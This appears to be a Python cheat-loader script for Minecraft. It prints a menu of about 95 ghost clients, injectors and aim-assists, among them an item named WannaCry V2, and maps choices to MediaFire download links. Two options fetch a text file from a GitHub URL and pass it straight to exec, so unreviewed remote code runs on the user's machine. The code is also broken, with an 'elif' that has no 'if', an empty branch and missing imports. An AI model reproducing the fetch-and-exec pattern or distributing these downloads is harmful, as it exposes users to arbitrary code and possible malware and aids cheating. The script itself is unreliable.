mine = """\033[1;39m

                     ███╗░░░███╗██╗███╗░░██╗███████╗░█████╗░██████╗░░█████╗░███████╗████████╗
                     ████╗░████║██║████╗░██║██╔════╝██╔══██╗██╔══██╗██╔══██╗██╔════╝╚══██╔══╝
                     ██╔████╔██║██║██╔██╗██║█████╗░░██║░░╚═╝██████╔╝███████║█████╗░░░░░██║░░░
                     ██║╚██╔╝██║██║██║╚████║██╔══╝░░██║░░██╗██╔══██╗██╔══██║██╔══╝░░░░░██║░░░
                     ██║░╚═╝░██║██║██║░╚███║███████╗╚█████╔╝██║░░██║██║░░██║██║░░░░░░░░██║░░░
                     ╚═╝░░░░░╚═╝╚═╝╚═╝░░╚══╝╚══════╝░╚════╝░╚═╝░░╚═╝╚═╝░░╚═╝╚═╝░░░░░░░░╚═╝░░░
\033[1;39m ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
\033[1;39m ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
\033[1;97m= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
       \033[1;39m┌─────────────────────────────────────────── Archive ────────────────────────────────────────────┐            
       \033[1;32m║                           \033[1;39m  Version          : \033[1;30m 1.0.8                                          \033[1;32m║
       \033[1;32m║                           \033[1;39m  Discord          : \033[1;34m https://discord.gg/n24UMEyWgJ       \033[1;32m║
       \033[1;32m║                           \033[1;39m  Source           : \033[1;33m https://discord.gg/n24UMEyWgJ                           \033[1;32m║
       \033[1;32m║                           \033[1;39m  Loader Plan      : \033[1;32m Free                                           \033[1;32m║
       \033[1;39m└────────────────────────────────────────────────────────────────────────────────────────────────┘
   \033[0;31m                               Create a ticket if u found a client that not working.
\033[1;97m= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
                                                \033[1;39m┌────────────────────┐         
                                                \033[1;32m║    \033[1;39m    Ghost       \033[1;32m║          
                                                \033[1;39m└────────────────────┘          
\033[1;31m[\033[1;39m1.1\033[1;31m] \033[1;32mVape Client \033[1;31m[\033[1;33mv0.28->v4.12\033[1;31m]  
\033[1;31m[\033[1;39m2.1\033[1;31m] \033[1;32mBlossom 
\033[1;31m[\033[1;39m3.1\033[1;31m] \033[1;32mDream Client \033[1;31m[\033[1;33mv4.6 + v4.8\033[1;31m]
\033[1;31m[\033[1;39m4.1\033[1;31m] \033[1;32mSlapp \033[1;31m[\033[1;33mv1.28\033[1;31m] 
\033[1;31m[\033[1;39m5.1\033[1;31m] \033[1;32mWhiteout \033[1;31m[\033[1;33mOld\033[1;31m] 
\033[1;31m[\033[1;39m6.1\033[1;31m] \033[1;32mEternal Client \033[1;31m[\033[1;33mUnknown Version\033[1;31m] 
\033[1;31m[\033[1;39m7.1\033[1;31m] \033[1;32mKoid 
\033[1;31m[\033[1;39m8.1\033[1;31m] \033[1;32mZoomin 
\033[1;31m[\033[1;39m9.1\033[1;31m] \033[1;32mLuvsy Client 
\033[1;31m[\033[1;39m10.1\033[1;31m] \033[1;32mDope Client \033[1;31m[\033[1;33mV1\033[1;31m] 
\033[1;31m[\033[1;39m11.1\033[1;31m] \033[1;32mCheckz 
\033[1;31m[\033[1;39m12.1\033[1;31m] \033[1;32mNeo Reach 
\033[1;31m[\033[1;39m13.1\033[1;31m] \033[1;32mObscure Client 
\033[1;31m[\033[1;39m14.1\033[1;31m] \033[1;32mLithium Lite 
\033[1;31m[\033[1;39m15.1\033[1;31m] \033[1;32mRaven \033[1;31m[\033[1;33mB1 -> BZ\033[1;31m] 
\033[1;31m[\033[1;39m16.1\033[1;31m] \033[1;32mFractal Injector \033[1;31m[\033[1;33mLunar Injectable\033[1;31m] 
\033[1;31m[\033[1;39m17.1\033[1;31m] \033[1;32mWTap V3 \033[1;31m[\033[1;33mNot working\033[1;31m] 
\033[1;31m[\033[1;39m18.1\033[1;31m] \033[1;32mESP Client \033[1;31m[\033[1;33mLunar Injectable\033[1;31m] 
\033[1;31m[\033[1;39m19.1\033[1;31m] \033[1;32mCucklord 
\033[1;31m[\033[1;39m20.1\033[1;31m] \033[1;32mCucklord Reborn 
\033[1;31m[\033[1;39m21.1\033[1;31m] \033[1;32mElixe Client 
\033[1;31m[\033[1;39m22.1\033[1;31m] \033[1;32mIridium Client 
\033[1;31m[\033[1;39m23.1\033[1;31m] \033[1;32mAxenta V2 
\033[1;31m[\033[1;39m24.1\033[1;31m] \033[1;32mSmok \033[1;31m[\033[1;33mv2.2\033[1;31m] 
\033[1;31m[\033[1;39m25.1\033[1;31m] \033[1;32mItami Client 
\033[1;31m[\033[1;39m26.1\033[1;31m] \033[1;32mKriso B1 
\033[1;31m[\033[1;39m27.1\033[1;31m] \033[1;32mMind Client 
\033[1;31m[\033[1;39m28.1\033[1;31m] \033[1;32mMye Ghost 
\033[1;31m[\033[1;39m29.1\033[1;31m] \033[1;32mNyctum 
\033[1;31m[\033[1;39m30.1\033[1;31m] \033[1;32mShiba 
\033[1;31m[\033[1;39m31.1\033[1;31m] \033[1;32mUboa V2 
\033[1;31m[\033[1;39m32.1\033[1;31m] \033[1;32mKarma \033[1;31m[\033[1;33mOld\033[1;31m] 
\033[1;31m[\033[1;39m33.1\033[1;31m] \033[1;32mWhiteout \033[1;31m[\033[1;33mWorking\033[1;31m] 
\033[1;31m[\033[1;39m34.1\033[1;31m] \033[1;32mEmo Client 
\033[1;31m[\033[1;39m35.1\033[1;31m] \033[1;32mEpic Client 
\033[1;31m[\033[1;39m36.1\033[1;31m] \033[1;32mGasper 
\033[1;31m[\033[1;39m37.1\033[1;31m] \033[1;32mChromatic 
\033[1;31m[\033[1;39m38.1\033[1;31m] \033[1;32mAkira Client \033[1;31m[\033[1;33mNot working\033[1;31m] 
\033[1;31m[\033[1;39m39.1\033[1;31m] \033[1;32mBayoneta 
\033[1;31m[\033[1;39m40.1\033[1;31m] \033[1;32mVega Client 
\033[1;31m[\033[1;39m41.1\033[1;31m] \033[1;32mDope V2 
\033[1;31m[\033[1;39m42.1\033[1;31m] \033[1;32mSumo 
\033[1;31m[\033[1;39m43.1\033[1;31m] \033[1;32mEvil Eye \033[1;31m[\033[1;33mUse at your own risk\033[1;31m] 
\033[1;31m[\033[1;39m44.1\033[1;31m] \033[1;32mBetterTimeChanger \033[1;31m[\033[1;33mUse at your own risk\033[1;31m] 
\033[1;31m[\033[1;39m45.1\033[1;31m] \033[1;32mCandy 
\033[1;31m[\033[1;39m46.1\033[1;31m] \033[1;32mStorm AimAssist \033[1;31m[\033[1;33mOnly Lunar 1.7.10\033[1;31m] 
\033[1;31m[\033[1;39m47.1\033[1;31m] \033[1;32mReach Display 
\033[1;31m[\033[1;39m48.1\033[1;31m] \033[1;32mNoise 
\033[1;31m[\033[1;39m49.1\033[1;31m] \033[1;32mSupremacy 
\033[1;31m[\033[1;39m50.1\033[1;31m] \033[1;32mSprite 
\033[1;31m[\033[1;39m51.1\033[1;31m] \033[1;32mWeizu Reach 
\033[1;31m[\033[1;39m52.1\033[1;31m] \033[1;32mJuul \033[1;31m[\033[1;33mUse at your own risk\033[1;31m] 
\033[1;31m[\033[1;39m53.1\033[1;31m] \033[1;32mEnthapy 
\033[1;31m[\033[1;39m54.1\033[1;31m] \033[1;32mLegitish \033[1;31m[\033[1;33mLunar Injectable\033[1;31m] 
\033[1;31m[\033[1;39m55.1\033[1;31m] \033[1;32mAscension 
\033[1;31m[\033[1;39m56.1\033[1;31m] \033[1;32mNorth Client 
\033[1;31m[\033[1;39m57.1\033[1;31m] \033[1;32mNovember \033[1;31m[\033[1;33m3.03\033[1;31m] 
\033[1;31m[\033[1;39m58.1\033[1;31m] \033[1;32mLighting 
\033[1;31m[\033[1;39m59.1\033[1;31m] \033[1;32mVertine \033[1;31m[\033[1;33mLunar Injectable\033[1;31m] 
\033[1;31m[\033[1;39m60.1\033[1;31m] \033[1;32mAmari \033[1;31m[\033[1;33mUse at your own risk\033[1;31m] \033[1;31m[\033[1;33mOnly for Lunar\033[1;31m] 
\033[1;31m[\033[1;39m61.1\033[1;31m] \033[1;32mSlinky \033[1;31m[\033[1;33mLatest 13/12/2023\033[1;31m] 
\033[1;31m[\033[1;39m62.1\033[1;31m] \033[1;32mPhysiological \033[1;31m[\033[1;33mUse at your own risk\033[1;31m] 
\033[1;31m[\033[1;39m63.1\033[1;31m] \033[1;32mAbyss
\033[1;31m[\033[1;39m64.1\033[1;31m] \033[1;32mHash
\033[1;31m[\033[1;39m65.1\033[1;31m] \033[1;32mEntropy \033[1;31m[\033[1;33mUse at your own risk\033[1;31m] 
\033[1;31m[\033[1;39m66.1\033[1;31m] \033[1;32mHuume
\033[1;31m[\033[1;39m67.1\033[1;31m] \033[1;32mHaru Aim-Assist
\033[1;31m[\033[1;39m68.1\033[1;31m] \033[1;32mDropsy \033[1;31m[\033[1;33mv0.4.4\033[1;31m] 
\033[1;31m[\033[1;39m69.1\033[1;31m] \033[1;32mLux
\033[1;31m[\033[1;39m70.1\033[1;31m] \033[1;32mMind
\033[1;31m[\033[1;39m71.1\033[1;31m] \033[1;32mVea
\033[1;31m[\033[1;39m72.1\033[1;31m] \033[1;32mWilly
\033[1;31m[\033[1;39m73.1\033[1;31m] \033[1;32mTrump
\033[1;31m[\033[1;39m74.1\033[1;31m] \033[1;32mGucci
\033[1;31m[\033[1;39m75.1\033[1;31m] \033[1;32mMagenta
\033[1;31m[\033[1;39m76.1\033[1;31m] \033[1;32mMob \033[1;31m[\033[1;33mUse at your own risk\033[1;31m] 
\033[1;31m[\033[1;39m77.1\033[1;31m] \033[1;32mMerge
\033[1;31m[\033[1;39m78.1\033[1;31m] \033[1;32mDream Advanced
\033[1;31m[\033[1;39m79.1\033[1;31m] \033[1;32mVirtyu Lite
\033[1;31m[\033[1;39m80.1\033[1;31m] \033[1;32mLatemod Client
\033[1;31m[\033[1;39m81.1\033[1;31m] \033[1;32mLean Client
\033[1;31m[\033[1;39m82.1\033[1;31m] \033[1;32mNight Injector \033[1;31m[\033[1;33mUse at your own risk\033[1;31m] 
\033[1;31m[\033[1;39m83.1\033[1;31m] \033[1;32mEncephalon \033[1;31m[\033[1;33mUse at your own risk\033[1;31m] 
\033[1;31m[\033[1;39m84.1\033[1;31m] \033[1;32mHypnotic 
\033[1;31m[\033[1;39m85.1\033[1;31m] \033[1;32mTap Client
\033[1;31m[\033[1;39m86.1\033[1;31m] \033[1;32mStarlight
\033[1;31m[\033[1;39m87.1\033[1;31m] \033[1;32mStarlight Remake
\033[1;31m[\033[1;39m88.1\033[1;31m] \033[1;32mDrizzle Ghost \033[1;31m[\033[1;33mUnknown version\033[1;31m]
\033[1;31m[\033[1;39m89.1\033[1;31m] \033[1;32mPolaroid \033[1;31m[\033[1;33mUnknown version\033[1;31m]
\033[1;31m[\033[1;39m90.1\033[1;31m] \033[1;32mFusion \033[1;31m[\033[1;33mUnknown version\033[1;31m]
\033[1;31m[\033[1;39m91.1\033[1;31m] \033[1;32mRipterms \033[1;31m[\033[1;33mUnknown version\033[1;31m]
\033[1;31m[\033[1;39m92.1\033[1;31m] \033[1;32mBlinky \033[1;31m[\033[1;33mUnknown version\033[1;31m]
\033[1;31m[\033[1;39m93.1\033[1;31m] \033[1;32mWannaCry \033[1;31m[\033[1;33mV2\033[1;31m]
\033[1;31m[\033[1;39m94.1\033[1;31m] \033[1;32mRaid0 \033[1;31m[\033[1;33mUnknown version\033[1;31m]
\033[1;31m[\033[1;39m95.1\033[1;31m] \033[1;32mRipterms \033[1;31m[\033[1;33mUnknown version\033[1;31m]
"""
print(mine)
while True:
    os.system('cls')
    print(mine)
    chon = input('                                               \033[1;39m[\033[1;31m×\033[1;39m] \033[1;39m>> ')
    elif chon == '1.1':
        exec(requests.get('https://raw.githubusercontent.com/Rafail2023/RovaClient/refs/heads/main/Vape.txt').text)
    elif chon == '2.1':
        webbrowser.open_new("https://www.mediafire.com/file/1ogrrrao7vkef7s/Blossom.zip/file")
    elif chon == '3.1':
        webbrowser.open_new("https://www.mediafire.com/file/ufktd90e503p7cb/drim.zip/file")
    elif chon == '4.1':
        webbrowser.open_new("https://www.mediafire.com/file/asd0skn12pgur93/Slap.zip/file")
    elif chon == '5.1':
        webbrowser.open_new("https://www.mediafire.com/file/890qfvw73k97qll/Whiteout_V2.3.zip/file")
    elif chon == '6.1':
        webbrowser.open_new("https://www.mediafire.com/file/p43x2u7j2428y4c/eternal_internal.dll/file")
    elif chon == '7.1':
        webbrowser.open_new("https://www.mediafire.com/file/znnwsj939jlby2g/Koid.zip/file")
    elif chon == '8.1':
        webbrowser.open_new("https://www.mediafire.com/file/tnqrduaaqyu9fn8/Zoomin.zip/file")
    elif chon == '9.1':
        webbrowser.open_new("https://www.mediafire.com/file/hrls1h4mp516fy7/Luvsy_Ghost_v1.0.zip/file")
    elif chon == '10.1':
        webbrowser.open_new("https://www.mediafire.com/file/22evfi1yvyaormy/Dope.zip/file")
    elif chon == '11.1':
        webbrowser.open_new("https://www.mediafire.com/file/gh4y87z2ybgvc9x/1.8-OptiFine_HD_U_H2.zip/file")
    elif chon == '12.1':
        webbrowser.open_new("https://www.mediafire.com/file/bsw9lwpbne9ev8w/Neo_Reach.zip/file")
    elif chon == '13.1':
        webbrowser.open_new("https://www.mediafire.com/file/idmpo6rmc56b826/Obscure.zip/file")
    elif chon == '14.1':
        webbrowser.open_new("https://www.mediafire.com/file/njdn9o73gehyxxb/Lithium_Lite.zip/file")
    elif chon == '15.1':
        exec(requests.get('https://raw.githubusercontent.com/Rafail2023/RovaClient/refs/heads/main/Raven.txt').text)
    elif chon == '16.1':
        webbrowser.open_new("https://www.mediafire.com/file/9bw1ggpe6lpitpe/Fractal.zip/file")
    elif chon == '17.1':
        webbrowser.open_new("https://www.mediafire.com/file/29naq1ybrud7f5k/WTap_v3.zip/file")
    elif chon == '18.1':
        webbrowser.open_new("https://www.mediafire.com/file/o565tmgdhx1chvd/ESP.zip/file")
    elif chon == '19.1':
        webbrowser.open_new("https://www.mediafire.com/file/9wstbkahtv0ux2j/Cucklord.zip/file")
    elif chon == '20.1':
    else:
        continue
